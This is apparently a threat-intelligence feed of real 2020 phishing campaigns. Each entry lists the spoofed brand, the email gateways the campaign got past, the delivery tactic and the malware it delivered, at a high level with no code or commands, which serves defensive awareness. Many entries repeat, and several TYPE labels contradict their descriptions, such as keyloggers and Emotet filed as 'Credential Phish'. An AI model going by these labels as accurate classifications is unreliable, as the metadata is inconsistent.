Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Symantec

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

Real Phishing Example: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an OneDrive embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an OneDrive embedded link.

Real Phishing Example: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an OneDrive embedded link.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: FedEx-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver Async RAT via an OneDrive embedded link.

Real Phishing Example: Copyright Violation-themed emails found in environments protected by Proofpoint and Microsoft ATP deliver Makop ransomware via an ALZ attachment.

ENVIRONMENTS: Proofpoint

TYPE: Ransomware

POSTED ON: 12/18/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Copyright Violation-themed emails found in environments protected by Proofpoint and Microsoft ATP deliver Makop ransomware via an ALZ attachment.

Real Phishing Example: TNT-spoofing emails found in environments protected by TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download an archive that contains an Agent Tesla keylogger executable.

ENVIRONMENTS: TrendMicro

TYPE: Keylogger

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: TNT-spoofing emails found in environments protected by TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download an archive that contains an Agent Tesla keylogger executable.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

ENVIRONMENTS: TrendMicro

TYPE: Keylogger

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Keylogger

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

ENVIRONMENTS: Cisco Ironport

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

ENVIRONMENTS: Mimecast

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

ENVIRONMENTS: Symantec

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro laden documents downloaded from embedded links.

Real Phishing Example: Bank-spoofing emails found in environments protected by Proofpoint deliver an Agent Tesla Keylogger binary in an attached .iso archive.
Note: these are in German.

ENVIRONMENTS: Proofpoint

TYPE: Keylogger

POSTED ON: 12/08/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Bank-spoofing emails found in environments protected by Proofpoint deliver an Agent Tesla Keylogger binary in an attached .iso archive. Note: these are in German.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 12/07/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 12/07/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

Real Phishing Example: Enel Energia-spoofing emails found in environments protected by Proofpoint deliver the banking trojan Ursnif via attached Office macro laden spreadsheets.
Note these are in Italian; Cofense saw approximately 200 of these as a large scale campaign found in environments protected by Proofpoint.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/01/2020

TACTIC: Attachment

THEME: Enel Energia

PHISHING EXAMPLE DESCRIPTION: Enel Energia-spoofing emails found in environments protected by Proofpoint deliver the banking trojan Ursnif via attached Office macro laden spreadsheets. Note these are in Italian; Cofense saw approximately 200 of these as a large scale campaign found in environments protected by Proofpoint.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver NanoCore RAT via embedded links. The embedded Dropbox links download a .Z archive that contains a NanoCore RAT executable.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 12/01/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver NanoCore RAT via embedded links. The embedded Dropbox links download a .Z archive that contains a NanoCore RAT executable.

Real Phishing Example: Inquiry-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded Onedrive links download a .RAR archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Keylogger

POSTED ON: 12/01/2020

TACTIC: URL Link

THEME: Inquiry

PHISHING EXAMPLE DESCRIPTION: Inquiry-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded Onedrive links download a .RAR archive that contains an Agent Tesla executable.

Real Phishing Example: Shipping-themed emails found in environments protected by Cisco Ironport deliver Mass Logger via attached XZ archives. The XZ archives contain a Mass Logger binary.

ENVIRONMENTS: Cisco Ironport

TYPE: Keylogger

POSTED ON: 11/30/2020

TACTIC: Attachment

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Shipping-themed emails found in environments protected by Cisco Ironport deliver Mass Logger via attached XZ archives. The XZ archives contain a Mass Logger binary.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro laden documents downloaded from embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 11/30/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro laden documents downloaded from embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 11/30/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro laden documents downloaded from embedded links.

Real Phishing Example: Coronavirus-themed, Kearney & Company spoofed, emails found in environments protected by Cisco Ironport deliver Credential Phishing.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 11/25/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed, Kearney & Company spoofed, emails found in environments protected by Cisco Ironport deliver Credential Phishing.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: URL LInk

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.
Note: They were made to look like a Dropbox document notification.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: URL LInk

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials. Note: They were made to look like a Dropbox document notification.

Real Phishing Example: Order-themed emails found in environments protected by Proofpoint deliver AZORult Stealer via attached password protected RAR archives. The RAR archive contains a GuLoader executable that downloads and runs an AZORult binary.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: Attachment

THEME: Order

PHISHING EXAMPLE DESCRIPTION: Order-themed emails found in environments protected by Proofpoint deliver AZORult Stealer via attached password protected RAR archives. The RAR archive contains a GuLoader executable that downloads and runs an AZORult binary.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: URL LInk

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

Real Phishing Example: File Transfer-themed emails found in an environment protected by Symantec deliver Agent Tesla Keylogger. An embedded Mediafire link downloads a TGZ archive that contains an Agent Tesla executable.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 11/16/2020

TACTIC: URL LInk

THEME: File Transfer

PHISHING EXAMPLE DESCRIPTION: File Transfer-themed emails found in an environment protected by Symantec deliver Agent Tesla Keylogger. An embedded Mediafire link downloads a TGZ archive that contains an Agent Tesla executable.

Real Phishing Example: Emails found in environments protected by Mimecast and Cisco Ironport claim to be Intuit QuickBooks invoices from various companies deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script which downloads JSSLoader.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 11/13/2020

TACTIC: URL LInk

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Emails found in environments protected by Mimecast and Cisco Ironport claim to be Intuit QuickBooks invoices from various companies deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script which downloads JSSLoader.

Real Phishing Example: Emails found in environments protected by Mimecast and Cisco Ironport claim to be Intuit QuickBooks invoices from various companies deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script which downloads JSSLoader.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/13/2020

TACTIC: URL LInk

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Emails found in environments protected by Mimecast and Cisco Ironport claim to be Intuit QuickBooks invoices from various companies deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script which downloads JSSLoader.

Real Phishing Example: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 11/11/2020

TACTIC: URL LInk

THEME: Microsoft

PHISHING EXAMPLE DESCRIPTION: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

Real Phishing Example: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 11/11/2020

TACTIC: URL LInk

THEME: Microsoft

PHISHING EXAMPLE DESCRIPTION: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links download a PDF file that contains a link that leads to a credential phishing landing page. The PDF was hosted and downloaded from Sharepoint.
Note: this campaign is in Dutch.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/11/2020

TACTIC: URL LInk

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links download a PDF file that contains a link that leads to a credential phishing landing page. The PDF was hosted and downloaded from Sharepoint. Note: this campaign is in Dutch.

Real Phishing Example: Courier-spoofed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download an tgz archive that contains an Agent Tesla keylogger executable. The payload was hosted and downloaded from OneDrive.
Note: this campaign is in Romanian.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/10/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Courier-spoofed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download an tgz archive that contains an Agent Tesla keylogger executable. The payload was hosted and downloaded from OneDrive. Note: this campaign is in Romanian.

Real Phishing Example: Purchase order-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download an ISO archive that contains an Agent Tesla keylogger executable.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL LInk

THEME: Purchase Order

PHISHING EXAMPLE DESCRIPTION: Purchase order-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download an ISO archive that contains an Agent Tesla keylogger executable.

Real Phishing Example: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL LInk

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

Real Phishing Example: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL LInk

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Mimecast deliver credential phishing via embedded links.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL LInk

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Mimecast deliver credential phishing via embedded links.

Real Phishing Example: Document-themed emails found in environments protected by O365-ATP deliver credential phishing via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL LInk

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Document-themed emails found in environments protected by O365-ATP deliver credential phishing via embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via embedded URLs.Note: These emails are in Spanish.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/04/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via embedded URLs.Note: These emails are in Spanish.

Real Phishing Example: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded Onedrive URLs.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 11/03/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded Onedrive URLs.

Real Phishing Example: Coronavirus-themed emails found in an environment protected by Microsoft ATP deliver Hentai Onichan ransomware dropped via HTML files downloaded from embedded URLs. This new variant of the Hentai Onichan ransomware known as King Engine exfiltrates data to an email address.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Ransomware

POSTED ON: 11/03/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails found in an environment protected by Microsoft ATP deliver Hentai Onichan ransomware dropped via HTML files downloaded from embedded URLs. This new variant of the Hentai Onichan ransomware known as King Engine exfiltrates data to an email address.

Real Phishing Example: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded Onedrive URLs.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 11/03/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded Onedrive URLs.

Real Phishing Example: Coronavirus-themed emails found in an environment protected by Microsoft ATP deliver Hentai Onichan ransomware dropped via HTML files downloaded from embedded URLs. This new variant of the Hentai Onichan ransomware known as King Engine exfiltrates data to an email address.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Ransomware

POSTED ON: 11/03/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails found in an environment protected by Microsoft ATP deliver Hentai Onichan ransomware dropped via HTML files downloaded from embedded URLs. This new variant of the Hentai Onichan ransomware known as King Engine exfiltrates data to an email address.

Real Phishing Example: Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/02/2020

TACTIC: URL Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable.

Real Phishing Example: WeTransfer-spoofing emails found in an environment protected by Symantec deliver Ave_Maria stealer via embedded URLs. The embedded URLs download a RAR archive that contains an Ave_Maria executable.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 11/02/2020

TACTIC: URL Link

THEME: File Transfer

PHISHING EXAMPLE DESCRIPTION: WeTransfer-spoofing emails found in an environment protected by Symantec deliver Ave_Maria stealer via embedded URLs. The embedded URLs download a RAR archive that contains an Ave_Maria executable.

Real Phishing Example: Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/02/2020

TACTIC: URL Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable.

Real Phishing Example: WeTransfer-spoofing emails found in an environment protected by Symantec deliver Ave_Maria stealer via embedded URLs. The embedded URLs download a RAR archive that contains an Ave_Maria executable.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 11/02/2020

TACTIC: URL Link

THEME: File Transfer

PHISHING EXAMPLE DESCRIPTION: WeTransfer-spoofing emails found in an environment protected by Symantec deliver Ave_Maria stealer via embedded URLs. The embedded URLs download a RAR archive that contains an Ave_Maria executable.

Real Phishing Example: Coronavirus-themed emails found in environments protected by Cisco Ironport deliver Hentai OniChan Ransomware via embedded URLs. The embedded URL downloads a password protected RAR archive that contains a DotNETLoader that downloads and runs the ransomware.

ENVIRONMENTS: Cisco Ironport

TYPE: Ransomware

POSTED ON: 10/30/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails found in environments protected by Cisco Ironport deliver Hentai OniChan Ransomware via embedded URLs. The embedded URL downloads a password protected RAR archive that contains a DotNETLoader that downloads and runs the ransomware.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/30/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

Real Phishing Example: Shipping-spoofing emails found in environments protected by Proofpoint deliver Banload via an embedded URL. Banload then downloads LatentBot.
Note: These emails are in Italian.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/30/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Shipping-spoofing emails found in environments protected by Proofpoint deliver Banload via an embedded URL. Banload then downloads LatentBot. Note: These emails are in Italian.

Real Phishing Example: Nexus Shipping-spoofing emails found in environments protected by Proofpoint deliver Loki Bot via an attached CVE-2017-0199 open XML exploit. The CVE-2017-0199 exploit downloads and runs a DOC file that exploits CVE-2017-11882 to download and run Loki Bot.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/30/2020

TACTIC: Attachment

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Nexus Shipping-spoofing emails found in environments protected by Proofpoint deliver Loki Bot via an attached CVE-2017-0199 open XML exploit. The CVE-2017-0199 exploit downloads and runs a DOC file that exploits CVE-2017-11882 to download and run Loki Bot.

Real Phishing Example: Response-themed email found in environments protected by Proofpoint deliver QakBot via malicious Office macros downloaded from an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/30/2020

TACTIC: URL Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed email found in environments protected by Proofpoint deliver QakBot via malicious Office macros downloaded from an embedded URL.

Real Phishing Example: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

ENVIRONMENTS: Mimecast

TYPE: Trojan

POSTED ON: 10/27/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

Real Phishing Example: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/27/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

Real Phishing Example: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

ENVIRONMENTS: Mimecast

TYPE: Trojan

POSTED ON: 10/27/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

Real Phishing Example: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/27/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

Real Phishing Example: Systel Inc-spoofing emails found in environments protected by Proofpoint and deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Canva

PHISHING EXAMPLE DESCRIPTION: Systel Inc-spoofing emails found in environments protected by Proofpoint and deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

Real Phishing Example: Systel Inc-spoofing emails found in environments protected by O365-ATP and deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Canva

PHISHING EXAMPLE DESCRIPTION: Systel Inc-spoofing emails found in environments protected by O365-ATP and deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

Real Phishing Example: Invoice-themed emails found in environments protected by Cisco Ironport deliver ZLoader via XLS attachments. The attached Office macros download and run a ZLoader binary.

ENVIRONMENTS: Cisco Ironport

TYPE: Malware

POSTED ON: 10/23/2020

TACTIC: XLS Attachment

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by Cisco Ironport deliver ZLoader via XLS attachments. The attached Office macros download and run a ZLoader binary.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/23/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT

Real Phishing Example: Invoice-themed emails found in environments protected by Mimecast deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by Mimecast deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

Real Phishing Example: Invoice-themed emails found in environments protected by O365-ATP deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by O365-ATP deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

Real Phishing Example: Response-themed emails found in environments protected by O365-ATP deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed emails found in environments protected by O365-ATP deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

Real Phishing Example: Response-themed emails found in environments protected by Cisco Ironport deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed emails found in environments protected by Cisco Ironport deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

Real Phishing Example: Finance-themed emails found in environments protected by Cisco Ironport deliver Pyrogenic stealer via embedded links. The embedded links download a Pyrogenic stealer binary.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

